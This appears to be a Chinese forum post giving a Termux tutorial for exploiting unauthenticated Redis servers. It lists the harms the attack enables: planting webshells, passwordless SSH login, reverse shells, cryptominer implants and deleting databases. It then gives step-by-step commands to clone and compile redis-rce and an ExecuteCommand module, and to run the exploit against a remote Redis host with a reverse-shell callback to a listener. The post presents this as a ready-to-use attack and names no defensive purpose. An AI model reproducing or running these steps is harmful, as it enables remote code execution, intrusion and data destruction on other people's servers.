[Termux原创]redis数据库漏洞利用工具
漏洞项:未授权访问危害:
写入木马getshell
免密钥ssh登录
反弹shell
可上传挖坑木马
任意操作数据库(可删除数据库)
详情参照:http://www.mucn.site/index.php/Termux/210.html
介绍方面上面的博文都写了,本文只介绍termux安装redis的漏洞利用工具。
前提:
termux中装有python3 以及 pip3
安装make
1. pkg install make
克隆redis-rce
2. git clone https://github.com/Ridter/redis-rce.git
克隆RedisModules-ExecuteCommand
3. git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
进入文件夹
4. cd RedisModules-ExecuteCommand/src
编译
5. make
复制文件
6. cp module.so ~/redis-rce
安装模块
7. pip3 install six
运行exp
8. python3 redis-rce.py -r 192.168.2.170 -p 6379 -L 127.0.0.1 -P 8989 -f module.so
注意:
-r参数是指远程Redis IP地址 -p是远程redis的端口 -L参数是指反弹到的服务器IP地址 -P是本地接受反弹的端口。
(注意大小写)
最好一张图正常运行。
http://cdn.u1.huluxia.com/g4/M03/65/8D/rBAAdl7gWBWAQNRAAAK9kuU02t0065.jpghttp://cdn.u1.huluxia.com/g4/M03/65/8D/rBAAdl7gWBaAbFU6AAPcCzsw8EQ907.jpghttp://cdn.u1.huluxia.com/g4/M03/65/8D/rBAAdl7gWBeAba3PAAJFYC-eJ-A970.jpg
页:
[1]